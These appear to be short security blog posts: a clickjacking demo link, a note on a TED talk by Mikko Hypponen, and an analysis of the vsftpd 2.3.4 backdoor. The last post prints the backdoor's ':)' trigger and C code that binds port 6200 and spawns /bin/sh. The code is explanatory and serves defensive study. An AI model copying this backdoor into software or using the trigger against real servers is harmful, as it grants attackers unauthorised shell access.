ClickJacking – A Demonstration Of An Ongoing Problem

After coming across a couple of news sites reporting on ClickJacking this afternoon, I decided create a post that would demonstrate just how easily ClickJacking is done. Please be aware that this post is very high level, and not an in-depth look at the attack vector. The hope for this post is that you can demonstrate to your friends / family just how easy it is to be caught out.

Due to the content of the post, I have put the content on a separate page:
(By the way, the irony of clicking this a link to go to a page about clickjacking is not lost on me 😀 If you are unsure, please just copy the above link).

Mikko Hypponen Talk at TED

For those that haven’t seen it, Mikko Hypponen (of F-Secure AntiVirus) has given a talk at TED about the future of security on the internet.

It’s an entertaining look into the world of antivirus research, with elements from malware history, as well as an interesting look at the stupidity of some malware creators.

Now if you are established in the computer security scene, you are not likely to learn anything technical from this talk, but what I enjoyed was Mikko’s enthusiasm on his pursuit of protecting the Internet.

The talk can be found at TED here

Vsftpd Backdoor Discovered

As you may have seen, there was a backdoor planted within version 2.3.4 of Vsftpd. Along with the announcement came confirmation from Chris Evans that Vsftpd’s hosting would be moved to Google.

The backdoor trigger was planed within ‘str.c’:

else if((p_str->p_buf[i]==0x3a)
&& (p_str->p_buf[i+1]==0x29))

As you can see, the code searches for bytes 0x3a and 0x29: or ‘:)’ for those who don’t like ASCII.

The vsf_sysutil_extra(); function is then inserted into sysdeputil.c as:

int vsf_sysutil_extra(void)
int fd, rfd;
struct sockaddr_in sa;
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6200);
sa.sin_addr.s_addr = INADDR_ANY;
if((bind(fd,(struct sockaddr *)&sa,
sizeof(struct sockaddr))) < 0) exit(1);
if((listen(fd, 100)) == -1) exit(1);
rfd = accept(fd, 0, 0);
close(0); close(1); close(2);
dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
execl("/bin/sh","sh",(char *)0);

Quite a simple and obvious backdoor, with no real attempt made to obscure the payload. This simply binds to port 6200 and listens forever, accepting connections and spawning a shell.